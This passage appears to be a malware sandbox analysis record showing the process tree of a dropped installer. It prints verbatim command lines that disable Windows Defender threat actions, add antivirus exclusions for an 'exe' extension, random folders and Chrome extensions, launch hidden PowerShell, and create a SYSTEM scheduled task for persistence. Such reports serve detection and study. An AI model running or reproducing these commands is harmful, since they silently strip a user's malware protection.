C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:3480
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:4564
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:4660
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4484
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:1892
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bLzeoVMxrLqUlFeJJd" /SC once /ST 23:19:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS72EE.tmp\Install.exe\" ks /LUwdidcVLW 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2688
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bLzeoVMxrLqUlFeJJd"4⤵PID:1296
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bLzeoVMxrLqUlFeJJd5⤵PID:4028
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bLzeoVMxrLqUlFeJJd6⤵PID:4992
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 5564⤵
- Program crash
PID:4892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS72EE.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS72EE.tmp\Install.exe ks /LUwdidcVLW 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:2148
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:1036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:3744
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:764
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4636
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1832
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4312
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:4624
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4608
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1980
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2176
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2436
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2520
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4936
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:4196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4876
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1708
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1180
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4664
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FtTPlVLhSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FtTPlVLhSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OOuPExCnaYTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OOuPExCnaYTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mpUBPkkqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mpUBPkkqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tQtOyvtwIjTyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tQtOyvtwIjTyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HNIqBcslfBUMDlVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HNIqBcslfBUMDlVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xWvzdveufkqfSjMY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xWvzdveufkqfSjMY\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:323⤵PID:2888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:324⤵PID:336
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:643⤵PID:4640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:323⤵PID:4252
-
-
